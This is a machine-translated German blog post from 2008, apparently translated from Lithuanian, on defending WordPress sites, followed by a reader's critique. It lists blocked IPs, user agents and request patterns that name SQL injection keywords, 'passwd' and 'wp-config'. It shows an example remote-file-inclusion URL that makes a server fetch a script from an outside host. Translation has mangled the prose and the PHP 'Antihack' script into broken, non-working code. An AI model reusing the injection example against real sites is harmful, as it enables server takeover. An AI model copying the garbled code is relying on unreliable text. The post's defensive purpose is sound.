Arbeiten Sie zu Hause / zuhause "und Blog-Websites brauchen Schutz

Es ist notwendig, Blog und Web-Sicherheit

Veröffentlicht am 19. Dezember 2008
Ausgewählt: Sicherheit

Sie wissen wahrscheinlich, dass in vielen Fällen, Webseiten oder Blogs zu hacken, vermasseln, verunreinigen vielen sinnlosen anonymen Kommentare automatisch versuchen, mit einigen Skripten. Natürlich gilt auch ziemlich oft in den manuellen Modus haben Sie keine Ahnung, was eine ziemlich beeindruckende Zahl Abies Fällen eine Methode der Verteidigung wirklich ist -.. Überprüfen Zugriffe und andere IP-Parameter an die Übeltäter geschickt, und um sie zu blockieren. Nutzen Sie einfach meine vorgeschlagenen Methoden, nicht nur sich selbst zu verteidigen, sondern auch um herauszufinden, wie weit und wie oft du angreifst. Mehr ...

Schutz Blog

Obwohl das Verzeichnis bietet eine "manuelle" Art und Weise der Verwendung von Wordpress ist ein besonderer Schutz, der für einen sichereren und saubereren Website erlaubt - TimesToCome Sicherheits-Plugin . Nach der Installation dieses Plugin fügt Sicherheitsparameter. Persönlich benutze ich die folgende IP blockiert, die User-Agent und Anfragen - ein Teil des Grundes, wie Sie die gefangen Show hier (Sie können auch Ihre Unterlagen). Und obwohl Sie auch in Firefox, Internet Explorer sehen kann - es wird oft auch als Bots.

Warnung. Nepriisiimu jede Verantwortung für die hier blockiert die IP, User Agent, Abfragen, lassen jeden Besucher, um zu entscheiden, ob eine Aufzeichnung geeignet ist, zur Verfügung gestellt.

Gesperrte IP: (Dies ist Ihre IP-Liste verbannt :)	Blockierte Anwenderprogramme (Dies ist Ihr Agent verbannt Liste)	Blockierte Zugriffe (Dies ist Ihre Anfrage Blacklist)
12.192.82.221 121.151.44.115 121.209.51.58 122133106125 123.224.54.112 124.59.113.24 125.141.64.124 128.163.2.43 131.220.64.240 137.48.217.20 142165135180 150.187.25.20 151.13.233.147 158.109.36.140 160.99.12.231 189104241248 190.183.61.18 190.196.2.205 190.196.5.189 193171110146 193.207.106.54 193.253.223.90 193.41.90.11 193.64.244.176 194.165.49.171 194219192251 194.244.39.57 195234106106 195.47.9.2 200.203.121.1 200.49.155.60 201.8.240.141 201.9.129.198 202.47.4.161 203.88.114.169 208.116.39.133 209.12.244.192 209.172.33.53 209195110123 209216249151 209.240.239.2 211.45.156.100 212.34.184.239 212.85.146.235 213.203.223.25 213.91.210.194 216.206.238.35 216.246.228.87 216.82.211.137 217198149178 217.64.177.199 218.186.13.3 218.234.19.139 219104211129 220.86.116.174 221.153.3.136 222.122.179.42 222.164.209.65 222.96.185.28 24.109.59.229 24.200.137.142 124.179.227.139 24.66.10.194 38.117.65.239 58.177.86.197 59.11.15.187 91.121.87.84 60.52.22.176 61.47.10.168 62.103.159.31 62128242180 62193211155 62.75.185.209 62.80.243.201 63.247.43.250 64.15.155.201 64185237191 64.21.98.196 64.246.187.54 65.254.54.218 65.254.63.210 65.95.110.16 65.95.153.184 65.98.67.106 66.135.41.76 66.98.244.93 67.15.48.60 67.18.29.218 67.202.60.246 67.219.69.45 67.68.20.251 67.70.127.164 67.71.176.187 68.147.159.38 69.128.204.74 69.14.152.152 69.157.22.63 69.159.63.161 69.94.120.198 70.85.201.66 70.86.30.82 70.87.240.50 71.101.46.11 71121104178 71.43.15.172 72.233.69.58 72.29.77.72 72.49.255.51 72.55.131.17 72.69.137.26 74.210.176.55 74.6.17.188 75125143162 76.66.125.33 76.68.22.147 76.71.160.65 77189155254 77203192230 78.111.68.37 78.130.75.90 78164157213 78.42.74.174 79133236143 79.136.97.34 79.66.133.114 79.76.213.251 80.146.78.213 80.218.173.93 80233176183 80.53.133.106 81.2.200.22 82.194.67.123 82.225.55.136 82.37.19.52 82.98.141.70 83.160.222.29 83.17.224.250 83240164232 83.65.47.4 83.81.61.72 84.165.87.140 84.72.120.152 85114140133 85157139109 85.171.82.87 85192189233 85.235.40.30 85.25.10.95 85.96.215.53 86.1.196.79 86109167160 86.109.96.134 86145194229 87.101.4.49 87106222144 87.234.201.76 87.61.174.29 88.119.99.10 88.214.192.29 88.223.50.146 88.244.162.64 88.252.145.65 88252149114 89.111.173.68 89.42.133.2 91121204165 91.186.11.35 91.84.19.133 91.89.198.178 92.233.76.213 92.4.112.196 64233183. * 61.103.33.48 92.61.36.98 96.247.65.124	AnotherBot botpaidtoclick Klicken Bot cr4nk PR 5,3 DataCha0s discobot EBM-APPLE EmailSearch EmailSiphon FAST ESP Document Retriever Firefox 2.0 Ginxbot GrubNG gvfs HTTrack Incutio Indy-Bibliothek Internet Explorer Internet Ninja Java JetBrains libcurl libwww-perl LWP-Anfrage LWP-triviale Macintosh; I; PPC Microsoft Data Access MJ12bot Morpheus Ficken Scanner Mozilla Firefox 5,0 Mozilla/4.0 (compatible Mozilla/4.08 Mozilla/4.61 (Macintosh Mozilla/5/0 (kompatibel Mozilla/7.0 Mozilla / 8 Mozilla / Firefox Mp3Bot MSIE6 NIPGCrawler PEAR PECL PHPot Entdecken Sie Protocol Provider PuxaRapido Pycurl Python-urllib Während die Sicherheit Site-Sniper SkyGrid Sogou sun4m Sonnenaufgang syncrisis topicblogs User-Agent W3CRobot W: PACBHO60 Web :: Scraper WebDav WebRipper Wget window.location Winnie Poh www.ranks.nl X12R1 Xerka-bot	$ _GET (Java \| VB) . Gif? . Jpg? . Txt? . XML? </ Script> <SCRIPT> ? Page_id = http% 3A% 2F% 2F admin-ajax.php? admin-function.php? ASCII board.php? siehe ftp = CAST com_jd-WP CONCAT DECLARE DELETE formmail includedir = index.php? template = INSERT LWP-triviale OPTIONS passwd PATH = POST / xmlrpc.php PROPFIND registrieren + + + + SELECT sidebar.php? UNION UPDATE Word-Rohr-button.php? wp-config wp-login.php? action = http% 3A% 2F% 2F wp-table-button.php? WP-trackback.php? x-aaaaaaaaa

Was ist die Abfrage und warum sie brauchen, um zu blockieren? Nehmen wir an, Ihre Website ist ein Schlupfloch, oder einfach nur die Offensive papuolėte Horizont (aber oft nur durch Angriffe auf Offensive Abfragen in einer Zeile).

Angenommen, eine Datei sidebar.php unsicher verbrachte die Abfragevariable VARIABLE sidebar.php? VARIABLE = http://www.kompiuteriszombis.com/botas.txt, Ihren Server botas.txt Skript ausgeführt wird, und man kann sagen, in den meisten Fällen ist Ihr Server bereits gehackt.

Website-Sicherheit.

Wenn Sie eine Website haben, können Sie dieses Skript verwenden, müssen Sie Ihre index.php speichern und ändern nemapirškite email@email.com in Ihrer E-Mail. E-Mail

/ ******************************* Antihack START **************** ************** /

/ / Prüfen Injektion
$ Req = $ _SERVER ['REQUEST_URI'];
Cadena $ = explode ($ Req "?");
$ = $ Mi_url Cadena [0];
$ = $ Cadena Restaurants [1];

/ / Erkennung
if (preg_match ($ inyecc, $ resto) &&! $ _REQUEST ['FullUrl']) {

/ / Mach was, im Beispiel per E-Mail-Warnung an Administrator
/ / $ Ip = $ HTTP_SERVER_VARS ["http_client_ip"];
$ Ip = $ _SERVER ['REMOTE_ADDR'];
Weitergeleitete $ = $ HTTP_SERVER_VARS ['HTTP_X_FORWARDED_FOR'];
$ = $ RemoteAddress HTTP_SERVER_VARS ["REMOTE_ADDR"];

$ Message = "Injection-Angriff in mi_url $ \ n \ nchain: $ resto \ n \ n
Von: (IP-zukunftsg-RA): - $ ip - $ Weitergeleitete - $ RemoteAddress \ n \ n
--- Ende ------- ";
E-Mail ( email@email.com , "Injection Attack", $ message,
"Von:" info @ {$ _SERVER ['SERVER_NAME']} ","-fwebmaster @ {$ _SERVER ['SERVER_NAME']} ");

# # # # Uzbaninam zu. Htaccess
$ Fh = fopen ('htaccess.', 'A') or die ("Konnte Datei nicht öffnen.");
Towrite $ = "\ n # $ RemoteAddress - $ rest";
Towrite $ = "\ Ndeny von $ ip \ n".;
fwrite ($ fh, $ towrite);

fclose ($ fh);

# # # #

/ / Kill die Nachricht und Ausführung
echo 'illegale url';
die ();
}
/ ******************************* Antihack END **************** ************** /

Sergey 'ZaZa' Kuraki schrieb:
2008 12 20 10:12

Für solche vor langer Zeit dalikams Apache mod_security erstellt wird - ich brauche nicht das Rad neu erfinden.

Wie für preg'o - wurde nicht in "ftp" Protokoll "Delete SQL-Abfrage erwähnt. Ebenfalls untersucht nicht nur die Abfrage, aber Variablennamen - so, bevor Sie diesen Code, jeder muss es für bedeutsam, dass der Einsatz

Beja, können SQL-Injection getan werden, und auf die linke Seite des "?" Eančia Adresse.

Wenn das System Code ist krumm - nur GET-Request wird nicht genug Schutz zu sein, müssen die Beiträge und Cookies zu filtern.

Es wäre viel angenehmer, die litauische Codekommentare überall sehen, nicht nur an einigen Stellen.

Nun, die Zertifikate für die htaccess Datei -. Nicht der sicherste Beruf. Natürlich hängt alles von dem Host-System.